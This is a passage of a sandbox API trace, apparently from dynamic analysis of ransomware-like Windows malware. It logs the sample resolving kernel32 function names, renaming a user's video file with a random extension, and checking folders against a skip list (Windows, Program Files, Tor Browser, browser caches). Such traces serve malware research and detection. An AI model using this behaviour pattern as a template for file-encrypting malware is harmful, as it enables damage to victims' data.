returned 22 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.219] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.219] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.219] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.219] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.219] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.220] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.220] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.220] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.220] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.220] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.220] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.220] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.220] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.220] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.220] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.220] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.220] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.220] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.220] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.220] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.220] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.220] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.220] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.220] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.221] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.221] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.221] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.221] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.221] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.221] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.221] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.221] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.221] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.221] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.221] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.221] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.221] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.221] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.221] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.221] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.221] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.221] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.221] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.222] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.222] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.222] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.222] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.222] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.222] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.222] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.222] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.222] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.222] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.222] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.222] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.222] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.222] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.222] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.222] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.222] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.222] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.222] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.223] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.223] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.223] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.223] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.223] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.223] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.223] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.223] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.223] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.223] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.223] lstrlenA (lpString="DELETEATOM") returned 10 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.223] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.223] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.223] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.223] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.223] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.223] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.223] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.223] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.224] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.224] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.224] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.224] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.224] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.224] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.224] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.224] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.224] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.224] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.224] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.224] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.224] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.224] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.224] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.224] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.224] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.224] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.225] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.225] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.225] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.225] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.225] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.225] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.225] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.225] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.225] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.225] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.225] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.225] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.225] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.225] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.225] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.225] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.225] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.226] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.226] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4") returned 59 [0087.226] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4.LRvxp") returned 65 [0087.226] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lk3nhpiapgop5jrw2r.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Lk3NhPIapGop5jrw2r.mp4.LRvxp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lk3nhpiapgop5jrw2r.mp4.lrvxp"), dwFlags=0x0) returned 1 [0087.226] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.227] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.227] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.227] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8dc74a80, ftCreationTime.dwHighDateTime=0x1d4c864, ftLastAccessTime.dwLowDateTime=0x226192f0, ftLastAccessTime.dwHighDateTime=0x1d4d0f2, ftLastWriteTime.dwLowDateTime=0x226192f0, ftLastWriteTime.dwHighDateTime=0x1d4d0f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ne-e0BIC1cg5IRWK", cAlternateFileName="NE-E0B~1")) returned 1 [0087.227] lstrcmpW (lpString1="ne-e0BIC1cg5IRWK", lpString2=".") returned 1 [0087.227] lstrcmpW (lpString1="ne-e0BIC1cg5IRWK", lpString2="..") returned 1 [0087.227] lstrcatW (in: lpString1="ne-e0BIC1cg5IRWK", lpString2="\\" | out: lpString1="ne-e0BIC1cg5IRWK\\") returned="ne-e0BIC1cg5IRWK\\" [0087.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="ne-e0BIC1cg5IRWK\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\" [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Program Files") returned 0x0 [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch=":\\Windows") returned 0x0 [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Games\\") returned 0x0 [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\ProgramData\\") returned 0x0 [0087.227] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0087.228] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ne-e0BIC1cg5IRWK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0087.228] StrStrW 